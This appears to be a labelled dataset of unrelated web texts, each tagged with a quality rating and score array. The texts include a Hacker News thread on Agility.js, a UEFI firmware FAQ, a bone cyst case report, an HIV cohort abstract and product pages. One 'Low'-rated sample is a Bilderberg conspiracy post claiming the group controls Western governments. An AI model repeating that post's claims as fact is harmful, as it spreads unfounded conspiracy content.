You can already skip in-object CSS. ~~~ bobbywilson0 I'm interested in your preference for HTML in JavaScript, what is your rationale? ~~~ arturadib First, I don't have to keep looking for ids/classes across multiple files when I'm maintaining/modifying an object. This makes maintaining an object that much easier. Also, because Agility allows me to refer to the root element of a view as the selector "&", I don't have to worry about maintaining that additional id/class. This becomes especially useful when you have many MVC objects (as most projects do), each with their own root element. Suddenly you have eliminated dozens of unnecessary ids/classes. ------ stephth The approach of mixing it all together - not just html/css/js, but also MVC - but still clearly separate those semantically, is very interesting. Thanks for sharing, @arturadib. What flavors of server-side frameworks would go well with it? ~~~ arturadib Thanks! I guess right now, given that the only persistence adapter provided is RESTful, any server-side that speaks REST should play well (Rails, Node- Express, etc). Check out the The Wall demo code for a Node.js example: <https://github.com/arturadib/thewall> ------ hippich Nice lib for small apps. But for something bigger I would consider go for Backbone - it have much more defined separation of models/controllers/views. Although I like data-bind stuff - really neat! ~~~ arturadib Hi there, thanks for your feedback! I don't necessarily agree with that Backbone comment. Separation of M-V-C (which Agility does too) is merely a fine-grained level of code organization, and it doesn't help with a large code base with many different abstract objects/components. For example, as you can see from the following code (from our demo app The Wall), the most significant aspect of code organization comes from a separation of concepts - such as "error message", "posts", "profile", "stream", etc - as separate objects: [https://github.com/arturadib/thewall/blob/master/public/app....](https://github.com/arturadib/thewall/blob/master/public/app.js) But again, Agility supports the more explicit syntax "model:{}", "view:{}", "controller:{}", if that's what you think helps you with your large code base. ------ rmoriz Artur, please stop spamming all backbone.js watchers on github. thanks ~~~ ibjhb +1 ------ alecperkins Seems neat, and the ugly parts, like \ in the strings for the templates, could be helped by CoffeeScript's syntax. I'm not wild about mixing markup and style into scripts, but it does keep things nice and self-contained and could be great for small projects. On the other hand, I don't like getting an unsolicited message about the project just because I'm watching Backbone.js on GitHub. I was mostly indifferent to Agility.js before, now I have some dislike of it. ~~~ devth Agreed. This is the second time this has happened to me in the last few months. Using GitHub repo followers as a spam list is unacceptable and makes me immediately dislike the project that the spammer is trying to make known. ------ nikcub what is with all the markup and css in code? this will never work for any project that requires designers. (ie. 95%+ of commercial projects) ------ arturadib Don't forget to check out the demo app: <http://thewall.agilityjs.com> Thanks! ~~~ buster How would you do i18n in agility.js? ------ josscrowcroft Does seem very neat and I like the proposal except for the idea that all JS/CSS/HTML are all contained in the same code... that to me seems like a recipe for headaches down the line, even if it does speed up initial development. ~~~ arturadib Hey there, I think it's actually the other way around -- down the line, I will appreciate the fact that all that stuff is right within the object I need to work on. There's no need to go around multiple HTML/CSS/JS files looking for the ids/classes I need to maintain. It's all right there. (I agree that the need for a backslash is annoying, but the tradeoff is favorable in my opinion). That being said, you don't _have_ to use in-object CSS, and very soon we'll be relaxing the HTML requirement as well. ~~~ rufugee I kind of like that idea as well, although the escaping is a little ugly. The purist in me wishes I was always dealing with objects which knew how to display themselves and behave. Then I'd simply be an object arranger/orchestrator and life would be simple. What is wrong with this approach really? ------ devmach I liked agility.js. But why are you using REST by default ? I know it's "cool" (= you can read this "other's use it" or "it's cacheable/more easy to understand" etc.) but i really hate when someone dictates me something. ~~~ arturadib Hey there, thanks for the feedback. I'm using REST b/c that's what I normally use on the server side (also it's pretty popular). Feel free to contribute your own adapter - it's really easy to create one! Get in touch if you need help. ~~~ devmach "persist" looks like easy to modify, i'll re-built it for my needs. One suggestion : maybe not perfect but, for html templates you can do what jQuery does: templates/html in <script> tag, user just gives the tag's id. this way, one can store all templates in one file. ------ beck5 I am working in Node this summer and when I read "Javascript MCV" I thought great a new server side framework. off topic yes, but blurring the lines between server and client has unexpected repercussions. ~~~ pjscott Where are the lines blurring? You've got a client and a server, and the two are sitting on different machines, communicating only via HTTP requests. The fact that they can be written in the same language is nothing too special; you can do the same with desktop apps, and have been able to for ages. If you could blur that browser-server line, I bet you could do some impressive things. Bonus points if you manage to do impressive things without opening up lots of security holes. :-) ~~~ beck5 its a small comment, I found my thought process quite interesting. If you want to talk about really blurring then a framework which can easily and safely share the same models on both the client and server would be very interesting. (looking forward to seeing what batman.js is) ------ ErikRogneby esc didn't work in the examples after interactions had occurred (or after clicking inside the popup). I'm using firefox 5. ~~~ arturadib thanks, I was aware of that. will open an issue.
Mid
[ 0.562340966921119, 27.625, 21.5 ]
--- title: Firmware WEG FAQ description: Firmware WEG - Frequently asked questions (FAQ) ms.date: 05/07/2018 ms.localizationpriority: medium --- # Firmware WEG: Frequently asked questions (FAQ) The following FAQ came about due to the number of machines still using Windows 7. Please send additional questions or comments to <[email protected]>. **Q:** If I am installing Windows 7 on Skylake, which configuration should be chosen? Should the firmware CSM be enabled with UEFI boot (Config \#2) or legacy boot MBR (Config \#3)? If Legacy boot mode, why? > **A:** Specifically, for Windows 7 it is recommended to use Config \#2. You will need to enable the CSM and set default to UEFI boot, falling back to legacy boot only if needed. Secure Boot will need to be disabled. > > Windows 7 is not able to support Config \# 1. Windows 7 has a dependency on Int10 support for basic display when the high-res graphics driver is not available (for example, Bugcheck, Sleep transitions, etc.), a dependency satisfied by the CSM. You can boot Win7 in UEFI mode if a partial CSM is in place (enabled) providing Int10 support. If firmware defaults to UEFI boot mode leaving Int10 CSM enabled, then Win7 will install successfully in UEFI mode. Microsoft has also backported TPM 2.0 support to Windows 7 for when it is installed in UEFI mode. For more information, see this KB article: [KB2920188](https://support.microsoft.com/help/2920188/update-to-add-support-for-tpm-2-0-in-windows-7-and-windows-server-2008). > > Microsoft recommends you should use Config \# 2; Legacy MBR Boot mode should not be used. **Q:** If I installed Windows 7 with CSM enabled, what will the partition table/disk configuration look like? > **A:** It depends on the boot devices priority defaults in firmware. If CSM is enabled and loaded into memory, this can sometimes cause install media to default to Legacy MBR boot. > > If you boot to legacy boot mode and go through installation you will typically have 2 partitions (as listed with diskpart.exe "list partition"). The first partition being active and listed as ‘system partition’, file system type being NTFS with a hidden \\boot folder. The second partition is where \\Windows is installed on another NTFS partition. > > If Windows is installing in UEFI mode, installation will create the EFI System Partition (ESP) as file system type Fat32, the Microsoft Reserve Partition (MSR) as RAW, and an OS / data partition using NTFS. If you mount and look at the ESP, you should see a folder \\EFI boot folder (folder may be hidden). > > Since you will need to leave CSM enabled in the system firmware for Windows 7, you may need to specifically select UEFI boot mode when booting to installation media (CD/DVD/USB) in order to install Windows 7 in UEFI boot mode. > Consult with PC manufacture for more information concerning boot options and BIOS configuration. **Q:** If I am installed Windows 7 with the CSM enabled in Legacy boot mode (config\#3), what is the upgrade path? > **A:** Upgrade path for this configuration (\#3) is still supported through Windows 10. Though you will not be able to use Secure Boot as it is only available in UEFI Config \# 1. If you desire to switch the system to UEFI boot, you will need to format and re-install the original operating system with disk partitioned for GPT disk using UEFI boot mode. You will not need to keep the CSM enabled during this transition unless you need to boot to Windows 7 for the upgrade (config\#2) if you are upgrading from Windows store or an online installation. > It is recommended to go straight to config\#1 (with the CSM disabled) for a pure UEFI environment, this is to make use of Secure Boot if firmware supports it. **Q:** Is there any user impact when switching the Firmware from CSM enabled with Legacy BIOS boot (config\#3) to CSM enabled UEFI boot (config\#2) and back? > **A:** This depends on how you go about switching. If you change from config\#3 to Config\#3, then attempt to boot, system may not boot. If you change back to config\#3 at this point, WITHOUT ANY FURHTER CHANGES TO SYSTEM, DISK or OS. Than you should be able to boot back into original OS, using the original config\#n. The recommendation is to *not* change the BIOS setting and instead upgrade "as-is". **Q:** Change from config\#2 to config\#1 to enable Secure Boot: > **A:** For newer systems; post 2015 (Skylake), and if system has CSM enabled, with Secure Boot disabled (they should be mutually exclusive) and OS is installed using UEFI boot method to GPT disk. After upgrading to Win10+, it should be a straightforward process of turning off the CSM and enabling Secure Boot in Firmware (if Secure Boot was setup in the factory and is an option in firmware). > > If after making the changes, the system is not able to boot, then system is more than likely configured to boot using CSM’s legacy BIOS for boot. If this is the case, this will require either Win10+ installation media, or a clean install of the original operating system (Windows 7). Ensuring that the CSM is enabled and installation/disk partition is set for UEFI boot mode which would later allow upgrade to Win10 in UEFI boot mode. > > Be sure to select UEFI boot to install media, firmware configuration may require further BIOS setting changes in order to boot to UEFI installation. > > Consult with PC manufacture for more information concerning boot options and BIOS configuration. **Q:** User is running Windows 7, before upgrade to Win 10, BIOS/Firmware is switched to UEFI. > **A:** \[Assuming that operating system was previously installed in Legacy BIOS boot mode.\] > > If the person who is installing Windows 10 goes through installation/setup. Windows setup will detect disk in Legacy MBR BIOS boot mode and attempt to install accordingly. Results may vary depending on system, boot method, installation media (if customized). However, you may get a message that the disk format is unsupported with this boot method. If you get this message it will be easy to format the disk and install fresh. WARNING, if you do format the disk you will **lose** any data that was on the disk. > > Recommendations are to change settings back to what they were prior to switching. This is so you can boot to the already installed operating system. Backup any data that you wish to save to an external storage location. Then go about re-provisioning the disk (clean the hard disk of existing partitions, boot to media in UEFI mode and perform fresh install to GPT disk). > > Caution; if you leave the CSM enabled, as in config\#2, there is a possibility that installation media may default to MBR boot. If operating system is installed in Legacy MBR boot mode. You will not be able to enable Secure Boot without again reprovisioning the disk and installing the operating system in UEFI Boot mode to GPT disk. You may wish to consult with PC manufacture for more information concerning boot options, BIOS configuration options as well as firmware updates and Secure Boot options. **Q:** Does UEFI support booting from a MBR partitioned disk? > **A:** No, booting from a MBR partitioned disk is only supported when booting in BIOS mode. If CSM is present and enabled, then legacy boot should be supported leveraging CSM’s legacy BIOS boot method. **Q:** What is the dependency on 32-bit vs. 64-bit UEFI? > **A:** Microsoft does support both 32 and 64 bit UEFI. The bitness of the OS and the UEFI firmware must match. (for example, if you have a 64-bit UEFI firmware then you must install 64-bit Windows OS). **Q:** Can you programmatically switch firmware settings? > **A:** No, most firmware settings are not standardized, and Microsoft does not offer a tool to allow a means to programmatically modify firmware settings. Consult with PC manufacture for details as there may be tools available for management and configuration. **Q:** How does switching from CSM enabled Legacy BIOS boot (config\#3) to CSM enabled UEFI boot (config\#2) impact Secure Boot behavior? > **A:** Secure Boot is only supported in UEFI mode with the CSM disabled. If Secure Boot was not pre-configured on the factory floor prior to system shipping out to customers, then you will probably not have the option available to you. If the system did previously have Secure Boot enabled, but disabled for current Windows 7 OS (using downgrade rights) then it may be as simple as disabling the CSM and enabling Secure Boot. However, if partition was cleaned and you are not setup for UEFI boot to GPT disk. Then you will need to clean the disk and re-install the operating system for UEFI boot prior to turning on Secure Boot. > > Consult with the original equipment manufacturer (OEM) prior to making any changes to ensure your system supports secure boot. > > **Note** Cleaning the disk will destroy any data that is on that disk even if in other partitions. **Q:** Any dependency on BitLocker and Non-Microsoft disk encryption tools? > **A:** Yes, switching UEFI/Legacy BIOS boot will likely cause boot to fail, and switching Firmware settings back to defaults should allow recovery. Suspending bitlocker, and in some cases, disabling Bitlocker or non-MS encryption tools would be recommended depending on if switching requires wiping the drive or just changing firmware settings (such as CSM/Secure boot) > > Consult with PC or software Manufacture for more information about configuration and defaults. **Q:** How is Secure Boot configured once the BIOS is switched to UEFI? > **A:** By default, for Win7 devices, Secure Boot is not implemented. If a system came with Windows 8 or higher, it's very likely that system would have Secure Boot configured as this was a Logo requirement. Secure Boot is only implemented on factory floor by the PC manufacturer. Please contact the PC manufacturer to see if they would be able to install Secure Boot on your system. You may need to send system back to PC manufacture to get this installed. **Q:** What is impact on a rollback/restore to Windows 7? > **A:** As long as there were no changes to firmware settings, rollback to original operating system should work. If firmware settings were changed, change them back to factory default (what they were prior to rollback). Consult with PC manufacture to find out what type of rollback method or recovery method is included with system. **Q:** What is the impact to WinRE? > **A:** WinRE is going to have the same boot process as the installed operating system. If you changed the firmware boot option (Legacy BIOS to UEFI) than attempting to boot to operating system or WinRE on disk will now fail. If you are booting to WinRE or WinPE on USB/CD/DVD, this will use a separate boot method. **Q:** What is dependency/impact on 32-bit vs. 64-bit OS going from Legacy boot to UEFI and vice versa if the firmware is 64-bit UEFI or 32-bit UEFI? > **A:** One limitation of Windows UEFI boot is that you can only boot an OS "bitness" that matches the UEFI that is installed (see Question 7). If you have a 32-bit UEFI, you can only install a 32-bit Windows on it. 64-bit Windows requires 64-bit UEFI or a CSM. However, if a system is missing a CSM, you cannot boot Win7 64-bit Windows OS. **Q:** Can you convert a system booting using Legacy MBR boot to GPT boot on the fly without impacting data? > **A:** No. Using Microsoft tools such as diskpart.exe will result in data loss. MBR boot and GPT boot are two different booting mechanisms that require a change to the disk that will remove all data from the disk in order to implement this change. Backup any data prior to attempting to make this change. ## Related resources [UEFI Firmware](/previous-versions/windows/it-pro/windows-8.1-and-8/hh824898(v=win.10)) [Windows 10 Specifications - Microsoft](https://www.microsoft.com/windows/windows-10-specifications) [Update to add support for TPM 2.0 in Windows 7 and Windows Server 2008 R2](https://support.microsoft.com/help/2920188/update-to-add-support-for-tpm-2-0-in-windows-7-and-windows-server-2008)
Mid
[ 0.6157303370786511, 34.25, 21.375 ]
-module('1f_multiple_arity_fns_with_exports'). -export([ arity/0 ]). arity() -> arity(erk). arity(B) -> B.
Low
[ 0.42570281124497905, 26.5, 35.75 ]
Iʼm staring out my window. The sky is steel grey sky and the rain is coming down in buckets. Its cold and dreary. As the afternoon progresses, the mercury is quickly dropping and snow, possibly up to 2 inches, is expected by early evening. Snow?? Already?? Itʼs only the first week of December! Then suddenly it hits me! In a couple of short weeks Iʼll be in Panama, land of tropical rain forests, sun and sea. Itʼs time for our annual trip! I’m excited and eager, soon Iʼll be sitting on the veranda of Agua Blanca, drinking my morning coffee, listening to the musical sounds of the wild Chiriqui Viejo river, and the chatter of beautiful hummingbirds as they flit thru the trees. The temperature will be a refreshing 70ʼdegrees, the sun will provide twelve hours of light and I will be in paradise again. I look forward to our trip to Agua Blanca every year. We spend all year creating beautiful gardens and outdoor rooms for our clients in Northern Virginia, but now at long last it is time to reconnect with my inner“zenity”. Thatʼs the part that gets lost living in the Beltway madness that is Northern Virginia. Agua Blanca and Panama Birding Adventures is situated just outside the bustling Town of Volcan, near Cerro Punta,Volcan Baru and the Chiriqui Highlands. The Breadbasket of Panama. Fresh food, fresh air and time for a fresh perspective. Here at Agua Blanca there are no tweets, no textʼs, no phones…no problem!! Just me, our guests, the birds, nature and my camera. Days are spent hiking through the lush Highland Cloud forest in search of the myriad of birds, including Tanagers, Euphonias, Honey creepers, Laughing Falcons, Hummingbirds and the elusive Quetzal, (who, by the way, I usually find). When Iʼm not looking up, the amazing orchids, tropical plants and dazzling array of beautiful flowers captures our hearts and soul. Once we are recharged, there are plenty of adventures to occupy the days, we go to the beach, visit Carla’s stunning Heliconia Botanical Gardens, visiting the pre-Colombian petroglyphs, orchid trekking, hiking the volcano, exploring other birding sites, fishing, visiting the hot springs, or just going out to eat at one of the many local restaurants. In the early evenings we sit on the veranda with a favorite beverage, and watch the fireflies light up the fields, between the river and our porch. Nights are spent star-gazing, at an unbelievable display in the night time sky. Then itʼs time to go to bed while the river lulls us to sleep, so we can get up and do it again! We are excited to finally be able to share our little piece of paradise with other nature lovers. Come join us at Agua Blanca and Panama Adventures. We have a hammock all ready, with your name on it.
High
[ 0.6762589928057551, 35.25, 16.875 ]
Introduction {#S0001} ============ An aneurysmal bone cyst is a benign aggressive bone lesion first described by Jaffe and Lichtenstein in 1942 \[[@CIT0001]\]. It is typically an expansile osteolytic lesion consisting of blood-filled spaces and channels that are divided by connective tissue septa, which may contain osteoid tissue and osteoclastlike giant cells \[[@CIT0002]\]. A neurysmal bone cysts comprise less that 1% of all primary bone tumors. There are few reported cases of aneurysmal bone cyst of the patella \[[@CIT0003]--[@CIT0011]\]. The most common extrapatellar site is the distal femur and proximal tibia, followed by the spine and pelvis \[[@CIT0012]\]. We report a particularly young patient with an aneurysmal bone cyst of the patella treated by curettage and iliac grafting with good result. Patient and observation {#S0002} ======================= A 9-year old boy presented to the pediatric department with chronic right knee pain and swelling which had increased during the previous 3 months. There was no history of recent skin or other infections, trauma, fever, or constitutional symptoms or signs. His medical history and family history were non contributory. A physical examination revealed tenderness and swelling over the patella. The patient had a full, active range of knee movement. Radiographs of the right knee showed an osteolytic lesion involving the hole patella. Endosteal scalloping and cortical thinning with mild expansion and a multi-loculated appearance was observed ([Figure 1](#F0001){ref-type="fig"}). Sagittal CT scan images showed a multi-loculated lesion in the patella ([Figure 2](#F0002){ref-type="fig"}). ![Radiography of the right knee showing an osteolytic lesion involving the hole patella](PAMJ-12-77-g001){#F0001} ![Sagittal CT scan image showing a multi-loculated lesion in the patella](PAMJ-12-77-g002){#F0002} An open bone biopsy of the patella with intraoperative frozen section was performed. The soft tissues appeared normal, but a thin anterior cortex of the patella was seen and punctured with an elevator. After removal of a large window of thin cortical bone, a large well-defined cavity filled with serosanguinous fluid was found. A rim of tissue that lined the cavity and curettings from within the cavity were sent for histologic analysis. The bony rim was sclerotic and intact. The posterior wall of the cavity was cartilaginous, but the patellar cartilage revealed no obvious violation of the joint surface. There was no evidence of malignancy. Intraoperative Gram stain and cultures were negative. The lesion was diagnosed as a bone cyst pending histologic analysis. Based on these intraoperative findings, the lesion was completely curetted. The periphery of the cavity was cauterized and then burred. The defect was packed with autologous iliac graft ([Figure 3](#F0003){ref-type="fig"}). ![Radiography of the right knee showing the iliac graft packing of the patella](PAMJ-12-77-g003){#F0003} Histopathologic examination of the biopsy material revealed empty spaces outlined by thin septa made of spindle cells, randomly scattered benign giant cells, and capillaries in a collagenous matrix. The septa were made of fibrous connective tissue containing fine strands of immature woven bone. Fiber osteoid was observed in some septa. There were no mitoses or atypical cells. These histologic findings were consistent with an aneurysmal bone cyst. Ten months after intralesional curettage and bone grafting, our patient returned to full activities without pain. He has regained full range of motion of his knee. Discussion {#S0003} ========== Patellar tumors are uncommon, but almost 75% of these diagnosed in children and adults are benign \[[@CIT0013]\]. Giant cell tumor and chondroblastoma are the most common benign patellar neoplasms whereas osteosarcoma is the most frequent primary malignancy \[[@CIT0013]\]. Aneurysmal bone cysts account for less than 1% of primary bone tumours and have a predilection for the metaphysis of the long bones of the leg. Only 1% of all aneurysmal bone cysts occur in the patella. Most patients with primary patellar tumours are young and active, and give a history of knee pain, swelling, and related trauma. Radiologically aneurysmal bone cysts appear as an eccentric or central osteolytic lesion with cortical expansion, giving a 'blown-out' appearance with extension into soft tissues. Trabeculae are rude at the periphery of the lesion but become delicate toward the center \[[@CIT0014]\]. Osteolytic lesions are surrounded by bony septa and the surface of the intra-osseous border shows periosteal and new bone formation. Benign chondroblastoma and bony giant cell tumor must be considered in the differential diagnosis of aneurysmal bone cyst since these tumors usually show the same clinical and plain X-ray features. CT scan and MRI display a better evaluation of internal architecture of the tumor. They demonstrate the presence of mineralization, expansion of the bone and changes in the cortex. They can also evaluate the extraosseous extent of the lesion. However, it is well known that neither CT scan nor MRI adds anything to plain radiographs in establishing the diagnosis of aneurysmal bone cyst \[[@CIT0015]\]. Intralesional curettage and bone grafting are the preferred treatment for benign patella tumors without articular involvement. Total patellectomy or patellar prosthesis is recommended for aggressive lesions that disrupt the patellar articular surface \[[@CIT0007], [@CIT0009]\]. This technique is rarely used in children. Recurrence rates after curettage vary widely from 9% to 71%, with lesions of the humerus and femur most common \[[@CIT0016], [@CIT0017]\]. Some authors have reported higher recurrence rates with aneurysmal bone cysts in children younger than 15 years \[[@CIT0018]\]. The average time between surgery and initial recurrence was 7.6 months \[[@CIT0017]\]. Repeated extended curettage and bone graft are recommended in the event of recurrence Conclusion {#S0004} ========== Aneurysmal bone cysts is benign tumor that may mimic other tubular bone\'s benign tumors. Its occurrence in the patella in children is highly exceptional. The classic radiographic appearances are not specific. Consequently, the diagnosis is most often made by histopathological assessment. The preferred treatment is intralesional curettage and bone grafting Competing interests {#S0005} =================== The authors declare no competing interests. Authors' contribution {#S0006} ===================== All the authors have contributed to this work in ways that complies to the ICMJE authorship criteria. The authors have read and approved the final version of this manuscript.
Mid
[ 0.596412556053811, 33.25, 22.5 ]
Q: Should I use MS Validation Application Block in an ASP.NET MVC app? I know that the MS Validation Application Block can be used with ASP.NET MVC but I'm not sure if I should. It looks like it hasn't been updated since 2007 - which is probably fine - I'm just being extra cautious before adopting something new into my app that i haven't used before. Is there any reason not to - or what does it do for me that is so great - or is there somethin upcoming I should wait for? A: Should be fine to use. There are some MVC projects that use it like xVal. The Validation Application Block got updates in 4.1 as well. The link you have is to an older version. Find out more about 4.1 here: http://msdn.microsoft.com/en-us/library/dd140088.aspx
Mid
[ 0.6041131105398451, 29.375, 19.25 ]
Cube It!, the newest game from Dracosoft, is fast-paced fun world of cubes and colors. Themed after the famous De Stijl art style, this game will leave you seeing cubes everywhere you go. Click on two groups of similar colors and they will disappear. Blocks meld with other blocks of the same color to form enormous cubes. Watch as the blocks grow larger while you play. The larger the cube is the more points earned.Download it now and try the 60 minute trial for free. Enjoy the fun with Dracosoft's newest game Cube It! What's New Version 1.1: Release notes were unavailable when this listing was updated. Ratings Details Cube It!, the newest game from Dracosoft, is fast-paced fun world of cubes and colors. Themed after the famous De Stijl art style, this game will leave you seeing cubes everywhere you go. Click on two groups of similar colors and they will disappear. Blocks meld with other blocks of the same color to form enormous cubes. Watch as the blocks grow larger while you play. The larger the cube is the more points earned.Download it now and try the 60 minute trial for free. Enjoy the fun with Dracosoft's newest game Cube It! Version 1.1: Release notes were unavailable when this listing was updated.
Mid
[ 0.6326034063260341, 32.5, 18.875 ]
Bilderberg 2016 Releases Participant List! You Won’t Believe Who’s On it and The Agenda They Admit To! “Bilderberg pulls the strings of every government and intelligence agency in the Western world.” ― James Morcan, The Ninth Orphan That is one of the truest statements coming straight from the mouth of a globalist himself! They are pulling a majority—if not all—of the strings that are in play today. From politics, to medical advancements, to technological, to world governance and more. They are a manipulative, power hungry group out for the betterment of themselves. On June 9th-12th this malicious Bilderberg group, will be hosting their 64th annual meeting since their formation in 1954. There will be a total of 130 participants from 20 different countries coming together in the Taschenbergpalais Hotel in Dresden, Germany to discuss policies and their secretive agendas behind closed doors. According to the Bilderberg websitethe agenda is set to include the immigration situation in Europe, cyber security, Russia, the middle class, and much more. This years participants include multiple power hunger globalists such as: the CEO of Shell, the CEO of Deutsche Bank, the Supreme Allied Commander of Europe, a US Senator, Chief Foreign Correspondent to NBC News, Vice Presidents, Presidents, CEO of Airbus, Prime Ministers, and more.Here is more on this breaking report… Want a deeper looking inside the Taschenbergpalais Hotel where the globalists are residing? Then check this out video byInfowars…
Low
[ 0.5247311827956991, 30.5, 27.625 ]
Monday, July 29, 2013 Friendly Encounters: Josh Watko Meets Pat Priest and Butch Patrick This is a weekly feature which highlights friends who have met celebrities. I first connected with Josh Watko when I stumbled upon JW's Wrestling Memorabilia, his outstanding website. Josh's site has reviews, lists, pictures, memories and meetings with wrestlers. He is a great fan and a very knowledgeable one, which makes his site so enjoyable. Josh's site is about wrestling, but Josh is not limited to just meeting wrestlers. He recently sent me his recap of meeting two stars of tv's The Munsters and I now share it with you. I usually limit myself to traveling solely for wrestling conventions and fanfests. That being said, if a classic television star is going to be nearby and the stars align, I often can't resist giving it a go. This is what happened when Pat Priest and Butch Patrick of "The Munsters" appeared at the Monster Bash Conference in Cranberry Township, PA. I grew up watching "The Munsters" as well as "The Addams Family." Both goofy, typical '60s series, but still the kind of entertainment that will take your mind off of everything else for thirty minutes or so. I'd heard of the Monster Bash Conference before, but none of the previous celebrity appearances that I knew of really interested me. In December of 2012 I saw the flyer advertising the mini Munsters reunion and it did intrigue me. Although I had met Mr. Patrick before, Pat Priest was completely new for me. My mind also flew to the amazing Munsters action figures that had been released not long before. While Herman, Lily, and Grandpa came packaged separately, Marilyn and Eddie were sold in a two-pack. What better item to get signed? After receiving the ghoulish figure twosome for Christmas, my mind was made up. The show was only about forty minutes from my home, which didn't make it feel as if I was going out of my way for this meet. Upon arrival, I could tell that the Monster Bash show is the kind of gathering that any fan of vintage sci-fi and horror (think '40s thru '70s) would love to find. Though I really had no interest beyond meeting the Munsters, I appreciated how much effort went into the show for the attendees who look forward to these three days for the entire calendar year. Film viewings, live entertainment, celebrity appearances, plenty of merchandise, and an overall "hands-on interactive" feeling seems to set it apart from the "Take-my-money-here's-your-autograph" feel of so many shows. You could tell that the large majority of attendees at this event feel like family. With the many warm greetings I received in my hour or so spent, I felt very welcome as well. Conveniently, the celebrity tables were set up in the main hallway after turning the corner from registration. Butch and Pat had yet to arrive, but their tables were fully set with their photos for sale, and a banana was also present on each. Spotting the banana made me think that both would soon be making their way down, so I decided to check out the vendor room. A short jaunt was all it took. I popped my head out into the hallway to see the bananas being devoured by the Munster legends. Pat Priest was first on my agenda. I was greeted with a warm smile and handshake. Pat may have been the second Marilyn Munster, but in my opinion the true Marilyn. Beverley Owen played the character for the first few episodes, but most Munster Memories are filled with Miss Priest. She is also the Marilyn as portrayed on the action figure. Any autograph was just $20 from Pat, and photos with her were free. I have a previous photo with Butch, so a photo with Pat was my goal. The fact that it was included in the price of the autograph was even better. She went to great pains to make sure that the photo came out perfect with good lighting. It's the little things like that which prove that you have a celebrity that cares about the fan experience. Pat was elated to see the figure and asked me if I had bought it at that show. She does not have one of her own. Sadly, the vendors at the show only had the other cast members for sale or a special boxed set of all five characters that are colored black and white. Butch Patrick was next, and also charged $20. Surprisingly, he informed me that he was also including a photo op with the price of the autograph, so I decided to ask for a "Munster sandwich" photo of the two with me in the middle. Both were happy to oblige, and I almost look like Herman in the photo with how I towered over them. Overall, it was a very satisfying experience. If another star that I had an interest in meeting were to appear at a future show, I would definitely consider attending Monster Bash again...even if, to me, it's really "Munster Bash." I really appreciate Josh sharing his celebrity encounters. Some day, I hope to meet the man behind JW's Wrestling Memorabilia. Now that would be a friendly encounter!
Mid
[ 0.6327433628318581, 35.75, 20.75 ]
Large Oval Wood Cutting Board Description Choose your personalization and wood type. This Oval board is 15 x 24 in Maple and you can add aluminum handles if you wish. All of our boards come with rubber feet attached with rust proof stainless steel screws. Handles * Personalization or Design Choice * Single Initial or 3 Letter Monogram (First, LAST, Middle), Name of Design from above or type "None" if no personalization chosen * Maximum number of characters: 12 * Required Fields $150.00 Qty: Details Highly Refined Linseed oil is recommended for our Maple boards. Proper care prevents the boards from drying out over time and also adds a darker luster to the boards' color. Studies have shown that dense hardwoods such as maple actually inhibit the growth of bacteria better than plastic. The wood absorbs moisture whereas water will sit in the knife grooves of the plastic, causing bacteria growth. Additionally, knives dull quickly using a plastic board vs. a wood board. Hand scrubbing with hot water and soap can clear microbes from the surface of new or used wooden cutting boards. Our wood boards naturally have variations in color patterns. The darker stripes mellow over time with continued use and oiling, and contribute to the natural beauty of the boards. Season your new board to prevent staining and absorption of food odors and bacteria.
High
[ 0.6611796982167351, 30.125, 15.4375 ]
Q: Why does `Microsoft.JScript` work in the Code behind but not within a `<% %>`? Why does Microsoft.JScript work in the Code behind but not within a <% %>? I keep getting "CS0234: The type or namespace name 'JScript' does not exist in the namespace 'Microsoft' (are you missing an assembly reference?)" Error but it doesn't make any sense at all. I can add the reference to Microsoft.JScript.dll and in the code behind it works, its just not working when I try to reference the thing in the web.config, or the page itself through the following code: <%@ Import Namespace="Microsoft.JScript" %> Web.Config <pages> <namespaces> <add namespace="Microsoft.JScript" /> </namespaces> </pages> The Error I'm constantly getting is this: Compiler Error Message: CS0234: The type or namespace name 'JScript' does not exist in the namespace 'Microsoft' (are you missing an assembly reference?) A: You need to include the Microsoft.JScript namespace at the top of the ASPX page, like this: <%@ Import Namespace="Microsoft.JScript" %> You can also include it globally in Web.config: <pages> <namespaces> <add namespace="Microsoft.JScript" /> </namespaces> </pages> A: You need to import the assembly, not just the namespace. e.g. <%@ Assembly name="Microsoft.JScript, Version=8.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" %>
Mid
[ 0.611510791366906, 31.875, 20.25 ]
[Clinical, biological, therapeutic and evolving profile of patients with HIV infection hospitalized at Infectious and tropical diseases unit in Abidjan (Ivory Coast)]. The objective of this study is to describe the clinical, biological, therapeutic and evolving current profile of hospitalized patients with HIV infection in the cohort of the Infectious and Tropical Diseases Unit (ITDU) in the aim to improve their care management. This is a retrospective study, conducted on medical data of hospitalized cases of patients with HIV infection in the ITDU at the teaching hospital of Treichville (Abidjan) from 2006 to 2007. During the two years, 447 patients were included in the study. Their average age was 39 years [18 years-86 years] and sex ratio was 0.69. Of the 447 patients, 35% were unemployed and 67% were new patients who had never undergone antiretroviral therapy (ART). The duration of drug exposure was less than 6 months in 59% of treated patients. The average time to initiate ART was seven weeks. Among naive patients 41.9% were lost to follow up, 35.9% were waiting for treatment and 22.1% waiting for baseline biological test to initiate ART. At the initiation of ART, 79.6% of patients had a CD4 count less than 200/mm(3). The reasons of hospitalization defining AIDS were dominated by tuberculosis (34.2%), cerebral toxoplasmosis (17.9%) and neuromeningeal cryptococcosis (8%). The main reasons of hospitalization in classifying non-AIDS were pyelonephritis (6.5%), bacterial pneumonia (5.4%) and undetermined infectious encephalitis (4.9%). Hospital mortality was 24.4%. The leading causes of death were tuberculosis (22.9%), cerebral toxoplasmosis (20.2%), undetermined infectious encephalitis (18.3%) and cryptococcal meningitis (13.7%). The profile of PLHIV in hospital is characterized by profound immunosuppression due to late diagnosis and high mortality associated with severe opportunistic infections and late initiation of ART.
High
[ 0.701754385964912, 32.5, 13.8125 ]
